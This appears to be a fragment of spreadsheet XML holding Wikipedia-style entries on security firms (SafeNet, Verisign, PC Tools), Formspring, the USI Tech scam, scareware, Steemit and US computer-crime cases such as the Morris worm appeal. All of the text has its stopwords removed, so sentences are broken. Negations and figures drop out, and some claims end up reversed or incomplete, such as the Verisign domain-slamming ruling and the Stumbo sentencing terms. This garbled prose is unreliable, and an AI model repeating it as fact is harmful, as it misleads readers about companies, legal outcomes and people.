february 2003: safenet acquires cylink raqia networks october 2003: safenet acquires business communications security november 2003: safenet moves corporate offices belcamp, march 2004: safenet acquires rainbow technologies. december 2004: safenet acquires datakey, april 2005: safenet acquires dmdsecure b.v. june 2005: safenet acquires mediasentry december 2005: safenet acquires eracom technologies 2006: safenet involved options backdating controversy. result, chief executive officer chief financial officer resigned, 2008 company's former sentenced months prison manipulating employee stock options. april 2007: californian equity company vector capital buys safenet $634 million, making private april 2008: safenet acquires ingrian networks, inc. 2008: safenet acquires beep science march 2009: safenet parent company, vector capital acquires aladdin knowledge systems april 2009: safenet sells mediasentry artistdirect december 2009: safenet acquires assured decisions, december 2012: safenet sells government solutions business unit raytheon august 2014: safenet announces acquired gemalto 2014 february 2015: safenet assured technologies launched fully owned subsidiary gemalto provide high assurance data security products technologies u.s. government. april 2019: thales group closes acquisition gemalto. thales cloud protection licensing formed serve global community, safenet assured technologies, entity serving u.s. government, becomes thales trusted cyber technologies. current former subsidiaries former rainbow technologies subsidiary safenet government solutions, formerly safenet mykotronx, still based torrance, california offices irvine, california columbia, maryland. company founded 1979 myko enterprises. changed name mykotronx, 1987 merged safenet part safenet merger rainbow 2004. safenet government solutions, operationally merged safenet lines organizations intentionally blurred financial reasons. safenet government solutions longer considered subsidiary. safenet government solutions provides information security communications security technology government. firm indefinite-delivery, indefinite-quantity contract kiv-7 line commercial off-the-shelf cryptographic devices provide protection digital voice communications secret, used agencies national security agency (nsa) national reconnaissance office. other products include kov-14 fortezza plus card developed part nsa's nssi program used secure terminal equipment. they previously developed clipper chip.in 2009, vector capital acquires aladdin knowledge systems, placed safenet annotation 'under common management'. 2010, companies officially merged. references external links official website u.s. subsidiary website</t>
  </si>
  <si>
    <t>Verisign</t>
  </si>
  <si>
    <t>verisign inc. american company based reston, virginia, united states operates diverse array network infrastructure, including internet's thirteen root nameservers, authoritative registry .com, .net, .name generic top-level domains country-code top-level domains, back-end systems .jobs, .gov, .edu sponsored top-level domains. verisign also offers range security services, including managed dns, distributed denial-of-service (ddos) attack mitigation cyber-threat reporting. 2010, verisign sold authentication business unit included secure sockets layer (ssl) certificate, public infrastructure (pki), verisign trust seal, verisign identity protection (vip) services symantec $1.28 billion. deal capped multi-year effort verisign narrow focus core infrastructure security business units. symantec later sold unit digicert 2017. october 2018, neustar, inc. acquired verisign’s security service customer contracts. acquisition effectively transferred verisign inc.’s distributed denial service (ddos) protection, managed dns, firewall fee-based recursive services customer contracts.verisign's former chief financial officer (cfo) brian robins announced august 2010 company would move original location mountain view, california, dulles northern virginia 2011 company's business east coast. company incorporated delaware. history verisign founded 1995 spin-off security certification services business. company received licenses cryptographic patents held (set expire 2000) time-limited non-compete agreement. company served certificate authority (ca) initial mission "providing trust internet electronic commerce digital authentication services products". prior selling certificate business symantec 2010, verisign million certificates operation everything military financial services retail applications, making largest world. 2000, verisign acquired network solutions, operated .com, .net .org tlds agreements internet corporation assigned names numbers (icann) united states department commerce. those core registry functions formed basis verisign's naming division, become company's largest significant business unit. 2002, verisign charged violation securities exchange act. verisign divested network solutions retail (domain name registrar) business 2003, retaining domain name registry (wholesale) function core internet addressing business.for year ended december 2010, verisign reported revenue $681 million, $616 million 2009. verisign operates businesses, naming services, encompasses operation top-level domains critical internet infrastructure, network intelligence availability (nia) services, encompasses ddos mitigation, managed threat intelligence. august 2010, symantec completed approximately $1.28 billion acquisition verisign's authentication business, including secure sockets layer (ssl) certificate services, public infrastructure (pki) services, verisign trust services, verisign identity protection (vip) authentication service, majority stake verisign japan. deal capped multi-year effort verisign narrow focus core infrastructure security business units. following ongoing controversies regarding symantec's handling certificate validation, culminated google untrusting symantec-issued certificates chrome browser, symantec sold unit digicert 2017 $950 million.verisign's share price tumbled early 2014, hastened u.s. government's announcement would "relinquish oversight internet's domain-naming system non-government entity". ultimately icann chose continue verisign's role root zone maintainer entered contract 2016. naming services verisign's core business naming services division. division operates authoritative domain name registries internet's important top-level domains, .com .net. also contracted registry operator .name .gov top-level domains well country code top-level domains (cocos islands) (tuvalu). addition, verisign primary technical subcontractor .edu, .jobs top-level domains respective registry operators, non-profit organizations; role verisign maintains zone files particular domains hosts domains domain servers. registry operators "wholesalers" internet domain names, domain name registrars “retailers”, working directly consumers register domain name address. verisign also operates internet's thirteen "root servers" identified letters (verisign operates root servers). root servers form hierarchical domain name system supports modern internet communication. verisign also generates globally recognized root zone file also responsible processing changes file ordered icann iana approved u.s. department commerce. changes root zone originally distributed root server, distributed thirteen servers separate distribution system verisign maintains. verisign root server operators operate thirteen root nameservers. root servers "anycasted” longer operated company's datacenters means increase redundancy availability mitigate threat single point failure. 2016 department commerce ended role managing internet's transferred full control icann. while initially negatively impacted verisign's stock, icann eventually chose contract verisign continue role root zone maintainer. verisign's naming services division dates back 1993 network solutions awarded contract national science foundation manage operate civilian side internet's domain name registrations. network solutions sole registrar internet's governmental generic top-level domains 1998 icann established system competitive registrars implemented. result policies, network solutions divided divisions. registry division established manage authoritative registries company would still operate separated customer-facing registrar business would compete registrars. divisions even geographically split registry moving corporate headquarters herndon, virginia, nearby dulles, virginia. 2000, verisign purchased network solutions taking role internet dns. registry division eventually became verisign's naming services division remainder network solutions later sold verisign 2003 pivotal equity group. company properties following sale authentication services division 2010, verisign relocated former headquarters mountain view, california, headquarters naming division sterling, virginia (originally registry's headquarters). verisign began shopping year permanent home shortly moving. they signed lease 12061 bluemont reston, former sallie headquarters, 2010 decided purchase building september 2011. they since terminated lease current space buildings lakeside@loudoun technology center. company completed move november 2011. headquarters located reston town center development become major commercial business region. addition reston headquarters, verisign owns three data center properties. 22340 dresden street dulles, virginia corporate headquarters (within large broad technology park), boulden circle castle, delaware, third fribourg, switzerland. their three data centers mirrored disaster data center minimal impact operations. verisign also leases office suite downtown washington, d.c., street government relations office located. also leased server space numerous internet data centers around world constellation resolution sites located, mostly major internet peering facilities. facility equinix ashburn datacenter ashburn, virginia, world's largest datacenters internet transit hubs. controversies 2001: code signing certificate mistake january 2001, verisign mistakenly issued class code signing certificates individual claiming employee microsoft. mistake discovered certificates revoked weeks later routine audit. because verisign code-signing certificates specify certificate revocation list distribution point, automatically detected revoked, placing microsoft's customers risk. microsoft later release special security patch order revoke certificates mark fraudulent. 2002: domain transfer suit 2002, verisign sued domain slamming transferring domains registrars making registrants believe merely renewing domain name. although found broken law, barred suggesting domain expire claim transfer actually renewal. 2003: site finder legal case september 2003, verisign introduced service called site finder, redirected browsers search service users attempted non-existent .com .net domain names. icann asserted verisign overstepped terms contract u.s. department commerce, essence grants verisign right operate .com .net, verisign shut service. subsequently, verisign filed lawsuit icann february 2004, seeking gain clarity services could offer context contract icann. claim moved federal california state court august 2004. late 2005 verisign icann announced proposed settlement defined process introduction registry services .com registry. documents concerning settlements available icann.org. icann comments mailing list archive documents criticisms raised regarding settlement. additionally verisign involved sex.com matter decided ninth circuit. 2003: gives .org domain keeping icann's charter introduce competition domain name marketplace, verisign agreed give operation .org top-level domain 2003 exchange continuation contract operate .com, which, time million registered addresses. 2005: retains .net domain mid-2005, existing contract operation .net expired five companies, including verisign, management verisign enlisted numerous telecom heavyweights including microsoft, ibm, microsystems, mci, others, assert verisign perfect record operating .net. they proposed verisign continue manage .net critical importance domain underlying numerous "backbone" network services. verisign also aided fact several bidders foreign-based, raised concerns national security circles. june 2005, icann announced verisign approved operate .net 2011. more information .net bidding process available icann. july 2011, icann announced verisign's approval operate .net extended another years, 2017. 2010: data breach disclosure controversy february 2012 verisign revealed network security repeatedly breached 2010. verisign stated breach impact domain name system (dns) maintain, would provide details loss data. verisign widely criticized disclosing breach earlier apparently attempting hide news october 2011 filing.because lack details provided verisign, clear whether breach impacted certificate signing business, acquired symantec late 2010. according oliver lavery, director security research ncircle "can trust site using verisign certificates? without clarity, logical answer no”. 2010: site domain seizures november 2010, u.s. immigration customs enforcement (u.s. ice) issued seizure orders sites .com internet addresses reported involved illegal sale distribution counterfeit goods. registry operator .com, verisign performed required takedowns sites order enforcement. informationweek reported "verisign received sealed court orders directing certain actions taken respect specific domain names". removal websites cited impetus launch "the dot-p2p project" order create decentralized service without centralized registry operators. following disappearance wikileaks following week forced move wikileaks.ch, swiss domain, electronic frontier foundation warned dangers pieces internet infrastructure name translation corporate control. 2012: site domain seizure march 2012, government declared right seize domains ending .com, .net, .cc, .tv, .name .org companies administering domains based government seize domains ending .com, .net, .cc, .name serving court-order verisign, manages domains. .org domain managed virginia based non-profit public interest registry. march 2012, verisign shut sports-betting site bodog.com receiving court order, even though domain name registered canadian company. references external links official website digicert certificates formerly verisign oral history interview james bidzos, charles babbage institute university minnesota, minneapolis. bidzos discusses leadership software security firm data security sought commercialize encryption technology well role creating conference founding verisign. oral history interview 2004, mill valley, california. business data verisign:</t>
  </si>
  <si>
    <t>Spyware Doctor</t>
  </si>
  <si>
    <t>tools (founded 2003), formerly known winguides.com, software company acquired symantec 2008; owner eventually discontinued tools name. company headquarters australia, offices luxembourg, united states, united kingdom, ireland ukraine. company previously developed distributed security optimization software microsoft windows platforms. products november 2006 software owned tools downloaded million times. tools browser defender tools browser defender, also called browser defender short, browser toolbar internet explorer mozilla firefox browsers windows based computers. browser defender allows safe surfing. tools iantivirus iantivirus updated 2012 rebranded symantec's norton brand. tools iantivirus free antivirus software intel based apple macintosh computers running 10.5 (leopard) 10.6 (snow leopard) initially released june 2008, used detect remove malware, spyware malicious exploits, using signature-based heuristic detection. iantivirus criticized scans macintosh viruses, ignoring windows linux viruses. praised speed usage system resources. tools internet security tools internet security, combination spyware doctor product firewall product anti spam product. provided functionality three stand alone products single seamless product. symantec longer offering product 2013. payware designed windows (32-/64-bit), windows (32-/64-bit), windows vista (32-/64-bit) windows (32-bit). tools registry mechanic tools registry mechanic, first software tools released, scanned windows registry find errors. version released october 2011, last one. tools spyware doctor tools spyware doctor, anti-malware software. spyware doctor detects malware based indicators compromise using spider technology. recent version spyware doctor released october 2011. symantec longer offering product 2013. tools spyware doctor antivirus tools spyware doctor antivirus features spyware doctor, added anti-virus capabilities. symantec sold since 2013; last available. threatexpert threatexpert site says advanced automated threat analysis system (initialized atas) built analyze report actions malware fully automated mode. march 2015 latest version beta version 1.0.1.0 march 2008. there updates since march 2008, site seems inactive. acquisition symantec august 2008, symantec announced signing agreement acquire tools tools would maintain separate operations. financial terms acquisition disclosed. symantec acquired tools us$262,000,000 october 2008.symantec withdrew entire tools security portfolio, comprising tools internet security, spyware doctor spyware doctor antivirus, 2013; tools sold could renewed december 2013. symantec said would affect tools utilities products. reception spyware doctor received world best award october 2007 issue magazine saying tools' spyware doctor winner, outperforming competition detecting removing test adware spyware samples."spyware doctor received several editors' choice awards magazine, including spyware doctor antivirus 2008. product also received numerous awards around globe. reviews positive early versions spyware doctor 5.0, company rewrote scratch, received negative commentary. cnet's download.com reviews, justifies 3-star rating saying, trial scans, spyware doctor repeatedly flagged several dozen harmless cookies potential threats, antispyware product tested. also unable learn threat spyware doctor flagged each." criticism symantec unsuccessfully sued washington resident running fake scans people subscriptions tools's registry mechanic, performance toolkit, norton utilities lawsuit claims company intentionally fake scans results real. references external links official website threatexpert iantivirus browser defender</t>
  </si>
  <si>
    <t>Spring.me</t>
  </si>
  <si>
    <t>spring.me social networking service. until rebranding 2013, known formspring, question-and-answer-based social network launched 2009 olonoh, founder online form builder formstack. august 2015, website become portal twoo; humor rainbow inc. disclose whether original contents still exist. history formspring launched indianapolis november 2009 founder online form builder formstack, olonoh. noticed users using service create "ask anything" forms decided launch separate site make easier. launch, formspring referred full url, formspring.me, distinguish formstack, time also called formspring.com. formspring.me gained million registered users first days, original formspring website renamed avoid confusion sites. formspring soon spun separate company moved francisco, california. sudden popularity, number websites quickly implemented similar features, askfm, tumblr, myyearbook's "ask services. june 2010, formspring launched major redesign, overhauling every aspect website.formspring received $2.5 million series seed round funding large group angel investors, including angel, lowercase capital, kevin rose, dave morin. formspring named rogelio (ro) choy april 2011. june 2011, formspring announced millionth user signed up.in june 2011, formspring launched features celebrities better communicate fans, including verified accounts. celebrity formspring users could found site's "formspring favorites" section, categorized verified users music, comedy various entertainment verticals. november 2011, formspring launched media partnership program, partnering first time media outlets including mtv, hearst, funny huffington post. early 2012, formspring reached billion responses. february 2012, formspring named innovative social media site fast company. features users site could follow others privately. while logged registered user, people could also questions followers homepage. spring.me also asked question named "formspring question day" flashed users' inbox. january 2011, spring.me added smile button acted similar like button facebook. september 2011, formspring released iphone application several months later, january 2012, added mobile presence launch android application.also january 2012, formspring launched additional features service. tool allowed users sort responses questions number "smiles" received bring liked content response streams. added functionality aimed give users power curate best content site. addition letting users smiled responses, feature allowed formspringers view responses users also smiled responses question asked multiple people once. second functionality launched gave formspringers option choose whether wanted publicly privately follow accounts users. part feature, formspring users able many others site following account. controversies since inception, formspring garnered controversies, especially among teenagers, opened doors harassment cyberbullying anonymity entries. fight several students high school harrisburg, pennsylvania, started argument formspring received media attention february 2010. march 2010, news article, later turned hoax, reported formspring creators planning release personal information users twitter social networking sites. formspring stated company blog never publicly reveal anonymous information users. march 2010, alexis pilkington, 17-year-old york high school graduate, committed suicide, reportedly several insulting comments targeting posted formspring days leading death. soon after, local grassroots boycott formspring site began.in february 2011, incident allegedly prompted bullying formspring death 15-year-old natasha macbryde bromsgrove, worcestershire, united kingdom. coroner's inquiry heard received anonymous personal abuse website february; appears compounded bullying teenage anxiety level, macbryde took life february researching suicide methods. according daily telegraph, shanie erwin told inquest natasha known received short anonymous message containing personal abuse formspring networking site february message, read jury erwin, derided macbryde "hiding" behind make-up. ended: “start acting nicer people lose everyone. mark words.”in september 2011, another bullying incident, involving anonymous harassment formspring, death 14-year-old. jamey rodemeyer, student williamsville north high school york state, united states, committed suicide september repeated incidents bullying real life formspring. rodemeyer's video, gets better", specifically called formspring factor contributing anti-gay bullying impacting life.in march 2011, formspring participated white house conference bullying prevention along mtv, facebook, survey monkey others. conference, formspring announced working media develop approaches detecting cyberbullying, design interfaces would help prevent mitigate occurs. january 2012, formspring also announced sponsor great american bull challenge, nationwide video contest encourages teenagers stand bullying.the concept formspring copied creators ask.fm, used format allowing anonymous questioning people knew offline, experts believe toxic inevitably lead trouble users. both sites linked several teenage suicides. closure rebranding formspring announced would closing months march april 2013. reason closure "been challenging sustain resources needed keep lights on". according announcement, asking questions formspring would disabled march 2013, entire site would shut permanently april 2013, which, content site would deleted.on march 2013, short updated statement released stated "great news! last-minute deal works help keep formspring more details follow coming week."on 2013, statement main page issued stating; "5/8/13 great news friends, formspring saved management. ready cool exciting features. stay tuned updates happy posting!!". 2013, spring.me acquired assets formspring. spring.me officially launched beta september 2013 launched publicly november 2013. august 2015, website become portal twoo, social discovery rating platform. also askfm references external links official website</t>
  </si>
  <si>
    <t>USI Tech</t>
  </si>
  <si>
    <t>tech limited (also known united software intelligence, stylised usi-tech) dubai-based cryptocurrency forex platform trading provider, suspected high-yield investment program ponzi scheme. prior going offline users' funds, usi-tech moved website .com top-level domain, domain, also appearing number mirror domains. joseph rotunda, director enforcement division texas state securities board, estimates scammers able extract hundreds millions dollars world. promoters based reports engadget, initially promoted oakey, kerry stockton, rodney burton, michael faust. oakey stockton british, currently live australia. burton (49, 2018), also known "bitcoin rodney", known purchasing $350,000 lamborghini huracan lamborghini newport beach costa mesa, california, using bitcoin. burton released jail 2010 serving five years drug dealing.dan putnam, identifies global, suspected parent company, also seen boasting mere investment grow us$10 million months eyeline trading. eyeline's homepage redirected tech brief period, also going offline. global registered limited liability company putnam's home state utah name richard theodore putnam. related companies eyeline trading march 2019, domain belonging tech redirected eyeline trading, another company claiming cryptocurrency forex platform trading provider. redirect suggests owners original website relaunched ponzi scheme eyeline trading, following tech's exposure enforcement. wealthboss eyeline trading collapsed following non-payment, subsequently rebranded wealthboss british columbia securities commission issued cautionary notice dealing eyeline. global according engadget, eyeline wealthboss listed global parent company. history december 2017, texas state securities board issued emergency cease desist order neither usi-tech sales agents, clifford thomas michael rivera, registered sell securities texas. december 2017, government brunswick issued consumer alert investing usi-tech, advised consumers contact commission approached investing company. january 2018, attorney general guam issued statement advising people exercise caution investing tech. january 2018, government saskatchewan issued cease trade order, requested anyone contacted usi-tech inform financial consumer affairs authority saskatchewan. april 2018, spanish financial regulator comisión nacional mercado valores added usi-tech warning list unauthorised firms entities. august 2018, financial markets authority zealand updated warning list include tech basis offering financial services products residents zealand without authorization, also warning operators characteristics scam. also bitconnect onecoin plustoken references external links official website</t>
  </si>
  <si>
    <t>Scareware</t>
  </si>
  <si>
    <t>scareware form malware uses social engineering cause shock, anxiety, perception threat order manipulate users buying unwanted software. scareware part class malicious software includes rogue security software, ransomware scam software tricks users believing computer infected virus, suggests download fake antivirus software remove usually virus fictional software non-functional malware itself. according anti-phishing working group, number scareware packages circulation rose 2,850 9,287 second half 2008. first half 2009, apwg identified 585% increase scareware programs.the "scareware" label also apply application virus pranks users intent cause anxiety panic. scam scareware internet security writers term "scareware" describe software products produce frivolous alarming warnings threat notices, typically fictitious useless commercial firewall registry cleaner software. this class program tries increase perceived value bombarding user constant warning messages increase effectiveness way. software packaged look feel mimics legitimate security software order deceive consumers.some websites display pop-up advertisement windows banners text "your computer infected harmful spyware programs. immediate removal required. scan, click 'yes' below." these websites saying user's job, career, marriage would risk. products using advertisements often considered scareware. serious scareware applications qualify rogue software. some scareware affiliated installed programs. user encounter pop-up website indicating infected. scenarios, possible become infected scareware even user attempts cancel notification. these popups specially designed look like come user's operating system actually webpage. 2010 study google found 11,000 domains hosting fake anti-virus software, accounting malware delivered internet advertising.starting march 2011, million sites around world infected lizamoon injection attack spread scareware.research google discovered scareware using servers check internet connectivity. data suggested million machines infected scareware. company placed warning search results users whose computers appear infected. another example scareware smart fortress. this site scares people thinking many viruses computer asks professional service. spyware some forms spyware also qualify scareware change user's desktop background, install icons computer's notification area (under microsoft windows), claiming kind spyware infected user's computer scareware application help remove infection. cases, scareware trojans replaced desktop victim large, yellow text reading "warning! spyware!" containing similar text, even forced screensaver change "bugs" crawling across screen. winwebsec term usually used address malware attacks users windows operating system produces fake claims similar genuine anti-malware software.spysheriff exemplifies spyware scareware: purports remove spyware, actually piece spyware itself, often accompanying smitfraud infections. other antispyware scareware promoted using phishing scam. uninstallation security software another approach trick users uninstalling legitimate antivirus software, microsoft security essentials, disabling firewall. since antivirus programs typically include protection tampered disabled software, scareware social engineering convince user disable programs would otherwise prevent malware working. legal action 2005, microsoft washington state successfully sued secure computer (makers spyware cleaner) million charges using scareware pop-ups. washington's attorney general also brought lawsuits securelink networks, softwareonline.com, high falls media, makers quick shield.in october 2008, microsoft washington attorney general filed lawsuit texas firms, branch software alpha red, producers registry cleaner scareware. lawsuit alleges company sent incessant pop-ups resembling system warnings consumers' personal computers stating "critical error message! registry damaged corrupted", instructing users visit site download registry cleaner cost $39.95. december 2008, u.s. federal trade commission ("ftc") filed complaint federal court innovative marketing, inc., bytehosting internet services, llc, well individuals jain, daniel sundin, james reno, marc d’souza, kristy ross. complaint also listed maurice d’souza relief defendant, alleged held proceeds wrongful conduct accusing violating law. alleged defendants violated deceptively marketing software, including winfixer, winantivirus, drivecleaner, errorsafe, antivirus. according complaint, defendants falsely represented scans consumer's computer showed compromised infected offered sell software alleged problems. prank software another type scareware involves software designed literally scare user unanticipated shocking images, sounds video. early program type nightmare, program distributed fish disks amiga computer (fish #448) 1991. when nightmare executes, lies dormant extended random period time, finally changing entire screen computer image skull playing horrifying shriek audio channels. anxiety-based scareware puts users situations positive outcomes. example, small program present dialog saying "erase everything hard drive?" buttons, labeled "ok". regardless button chosen, nothing destroyed. this tactic used advertisement campaign sir-tech 1997 advertise virus: game. when file run, full screen representation desktop appears. software begins simulating deletion windows folder. when process complete, message slowly typed screen saying "thank game." screen purchase information appears screen returns desktop. damage done computer advertisement. also ransomware rogue security software winwebsec notes further reading o’dea, hamish (2009-10-16). "the modern rogue malware with face". australia: microsoft. {{cite journal}}: cite journal requires |journal= (help) external links demonstration scareware youtube case unusable system yes, cleanup a.m. waste</t>
  </si>
  <si>
    <t>Steemit</t>
  </si>
  <si>
    <t>steemit blockchain-based blogging social media website. users gain cryptocurrency, steem, publishing curating content. company owned steemit inc., privately held company based york city headquarters virginia. operating principle steemit designed decentralized application (dapp) built upon steem blockchain, using eponymous cryptocurrency steem reward users content. voting posts comments, users decide payout posts. users also called "curation rewards" finding upvoting content gets upvoted users afterwards. history july 2016, steemit, inc., company founded scott blockchain developer daniel larimer, launched social media platform steemit first application built upon steem blockchain. july 2016, steemit announced website hacked. attack, according them, compromised accounts. about us$85,000 worth steem dollars steem reported taken attackers.in march 2017, daniel larimer stepped back steemit's chief technology officer left company.with steem price dropping 2018 cryptocurrency crash, steemit faced financial difficulties staff. references external links steemit</t>
  </si>
  <si>
    <t>Rebekka Guðleifsdóttir</t>
  </si>
  <si>
    <t>rebekka guðleifsdóttir (born 1978) photographer iceland named "web's photographer" wall street journal july 2006. biography lived gainesville, florida currently lives hafnarfjörður, near reykjavík, iceland. flickr images creating appearing toyota advertising campaign.her posted images flickr copyrighted, sold third party without consent. "only dreemin" sold prints, seven photos, £2,500. protested putting photo flickr named "only dreemin" text telling illegal sale, flickr removed saying users cannot "harass, abuse, impersonate, intimidate others". since then, thread back online flickr guðleifsdóttir received official apology. 2014 book moodscapes published. details capturing fine landscape photography, features images signature style including self-portraits. references external links rebekka gudleifsdóttir flickr</t>
  </si>
  <si>
    <t>Unica NetTracker</t>
  </si>
  <si>
    <t>unica nettracker analytics application processed files. unica announced end-of-life end-of-support december 2011. history unica nettracker first released 1996 sane solutions sold unica corporation. current version december 2006 7.1.0. technology nettracker processes files virtually format using custom definition. logs processed servers, proxy servers, streaming media servers servers. well processing files nettracker page data augment file data. nettracker stores processed files internal database based upon sqlite. also analytics analysis software unica netinsight, successor unica nettracker external links unica analytics example reports unica nettracker's proxy firewall logfile analysis nettracker calculator understanding funnel reports nettracker</t>
  </si>
  <si>
    <t>StegAlyzerAS</t>
  </si>
  <si>
    <t>steganography analyzer artifact scanner, stegalyzeras, computer forensics software made backbone security's steganography analysis research center. designed extend scope traditional digital forensic examinations allowing examiner scan suspect media forensic images suspect media known artifacts steganography applications.artifacts identified scanning file system well registry microsoft windows system. stegalyzeras allows identification files using crc-32, md5, sha-1, sha-224, sha-256, sha-384, sha-512 hash values stored steganography application fingerprint database (safdb). safdb largest commercially available steganography hash set. known registry keys identified using registry artifact database (rakdb) distributed stegalyzeras. references external links steganography analyzer artifact scanner</t>
  </si>
  <si>
    <t>United States v. Stumbo</t>
  </si>
  <si>
    <t>united states stumbo, federal court case eastern district california year defendant, tyler stumbo, convicted conspiracy distribute anabolic steroids, time class prohibited substance. this violation title sections 841(a)(1), 841(b)(1)(d) 846, carried minimum penalty years prison maximum penalty life prison well maximum fine $250,000. charges filed dea. summary stumbo arrested eight kilogrammes anabolic steroids raided underground laboratories. stumbo also possession several guns time. arrest part operation deal, targeted black market manufacturers distributors anabolic steroid, human growth hormone insulin growth factor. total people arrested, laboratories seized operation. pounds material used production goods sourced china. often user high school athlete looking edge playing field... finished drugs often manufactured unsanitary conditions, including bathtubs bathroom sinks. stumbo pushed illicit drugs bodybuilding website advertisements. distribution business went name osoca laboratories, posed ordinary firm. communication stumbo originated e-mail. stumbo used hushmail e-mail service provider. arranged stumbo purchase money order steroid merchandise store maildrop, discovered owner stumbo.in order satisfy court information true, needed obtain stumbo's e-mail records. market differentiation hushmail provides secure communication java client-server technology. revealed interview hushmail's company complies british columbia supreme court orders produce evidence requested competent authorities. this includes warrants approved minister justice mutual legal assistance criminal matters (canada). foreign authorities must make formal request solicitor-general canada applies, sworn affidavits, order court.on january 2012, stumbo sentenced months probation days served home detention electronic monitoring conviction obtained. references</t>
  </si>
  <si>
    <t>United States v. Solon</t>
  </si>
  <si>
    <t>united states solon, f.3d 1206 (10th cir. 2010), case nathaniel solon, resident casper, wyoming, convicted possession child pornography. case became known media irregularities process, suspicions (affirmed defendant) material introduced malware computer. there people accused similar crimes, later acquitted, solon never exonerated. background nathaniel solon charged january 2007, indictment possessing child pornography. october 2007, pleaded guilty. when came back another hearing january 2008, however, solon stated innocent man, reason pleaded guilty first place believed financial resources hire expert witness investigate defense. regard explanation, court appointed private attorney represent him. with court's approval, solon able request expert witness, investigation budget $20,000 supplied court. also frameup references external links framed child porn, website collecting similar cases, inspired case. text united states nathaniel solon, f.3d 1206 (10th cir. 2010) available from: courtlistener findlaw google scholar justia leagle</t>
  </si>
  <si>
    <t>United States v. Morris (1991)</t>
  </si>
  <si>
    <t>united states morris appeal conviction robert tappan morris creating releasing morris worm, first internet-based worms. this case resulted first conviction computer fraud abuse act. process, dispute clarified much language used law, heavily revised number updates passed years initial drafting. also clarified concept "unauthorized access," central united states' computer security laws. decision first u.s. court refer "the internet", described simply national computer network." case background robert tappan morris cornell student, began work 1988 early internet worm. given explicit access cornell computer account upon entering school, used access develop worm. morris released worm mit, attempt disguise source. worm spread four mechanisms: through sendmail, email program. through finger, program used find information users networked computers. through "trusted hosts" feature, allows users system another system without password. through password brute-force attack.the worm designed would spread computers already infected. prevent computers defending pretending worm, however, would still infect already infected computer seven times. worm also designed would erased infected computer shut down, thus preventing multiple infections becoming problematic. morris' underestimation rate reinfection causing safeguard ineffective, "tens thousands" computers rendered catatonic repeated infections. estimated $200 $53,000 required infected facility clean worm.morris found guilty united states district court northern district york violating u.s.c. 1030(a)(5)(a), sentenced three years probation, hours community service, fine $10,050, cost supervision. discussion legal discourse took place three main issues: whether morris intended cause damage, whether morris really gained unauthorized access, whether district court properly informed jury subtleties case. intent cause damage read 1991, u.s.c. 1030(a)(5)(a), part computer fraud abuse act, covered anyone who:(5) intentionally accesses federal interest computer without authorization, means instances conduct alters, damages, destroys information federal interest computer, prevents authorized computer information, thereby causes loss others value aggregating $1,000 one-year period; morris argued apply him, government could conclusively prove intended cause damage federal interest computer. federal interest computers defined participate national international commerce, used federal governmental institution. government disagreed, stating since comma separated "intentionally" phrase rest section, necessarily apply. this punctuation separate adverbs precedents burlington okla. comm'n consumer product safety comm'n sylvania, inc. court also took consideration language used previous versions determine intent congress. 1986 amendment law, section 1030(a)(2) mental state requirement changed "knowingly" "intentionally." this done order disallow purposeful unauthorized access, "mistaken, inadvertent, careless" acts. court reasoned since "intentionally" phrase inserted order avoid punishing users accidentally accessed computer authorization applied strictly "accesses" clause, "damages" one. there evidence congress intended make legal accidentally damage another computer, therefore "intentionally" specification made there. additionally, government suggested many subsections 1030, specifically (a)(1), continue repeat mental state requirement clause, indicating lack repetition (a)(5)(a) indicative short reach "intentionally" adverb. contest claim, morris cited different section senate report: "[t]he subsection 1030(a)(5) created bill designed penalize intentionally alter, damage, destroy certain computerized data belonging another." court however, found government's evidence changing language statute convincing. unauthorized access morris argued that, since given access computers cornell, harvard, berkeley, releasing worm simply exceeded authorized access, gained unauthorized access. reason, theorized section (a)(3), (a)(5)(a), properly covered him. this defense based another section senate report, stated computer fraud abuse would aimed "outsiders" (people authorized federal interest computers). because morris access computers nature, stated actions completely unauthorized. however, aforementioned senate report also states applies "where offender's trespass interdepartmental nature." court reasoned since morris' worm reached computers spanning u.s. government departments, including military ones, u.s.c. 1030 properly applied him. court also pointed since morris used sendmail finger programs intended used, "exceeded authorization" defense weakened. since morris used programs security holes could exploit gain access computers could otherwise access, exemplifies "unauthorized access". fact worm guessed passwords break systems highlights point. proper instruction jury morris claimed district court improperly educated jury specifics case. first, complained district court provided definition "authorization" jury. court stated "authorization" common usage required defined. appellate court case agreed, citing precedent. morris also contended district court wrongly instruct jury "exceeding authorized access" using proposed definition. again, appellate court agreed district court's decision, stating extra definition would potentially confusing, morris's proposed instruction incorrect. additionally, term "exceeding authorized access" implies less serious "unauthorized access," even case, morris liable many parts computer fraud abuse act. court's decision court appeals, second circuit affirmed decision lower district court, morris found guilty violating u.s.c. 1030(a)(5)(a), felony. case reception 1996 computer fraud abuse amended clarify intent problems made majority u.s. morris. adverbs "knowingly" "intentionally" inserted places statute, attempt make litigation simpler future.this case affirmed strength computer fraud abuse act. prior decision, assumed required intent cause damage thought hard prove. ruling demonstrated case. references</t>
  </si>
  <si>
    <t>United States v. Fricosu</t>
  </si>
  <si>
    <t>united states fricosu, f.supp.2d 1232 2012), federal criminal case colorado addressed whether person compelled reveal encryption passphrase password, despite u.s. constitution's fifth amendment protection self-incrimination. january 2012, judge robert blackburn held writs act, fricosu required produce unencrypted hard drive.fricosu's attorney claimed possible remember password. month later, fricosu's ex-husband handed police list potential passwords. passwords worked, rendering self-incrimination issue moot. electronic frontier foundation filed amicus brief support fricosu.fricosu subsequently entered plea agreement 2013, meaning question defendant's right resist mandatory decryption addressed higher court time future case addressing issue arises. also disclosure boucher united states kirschner references further reading mcgregor, nathan (2010). "the weak protection strong encryption: passwords, privacy, fifth amendment privilege" (pdf). vanderbilt journal entertainment technology law. (3): 581–609.</t>
  </si>
  <si>
    <t>United States v. Drew</t>
  </si>
  <si>
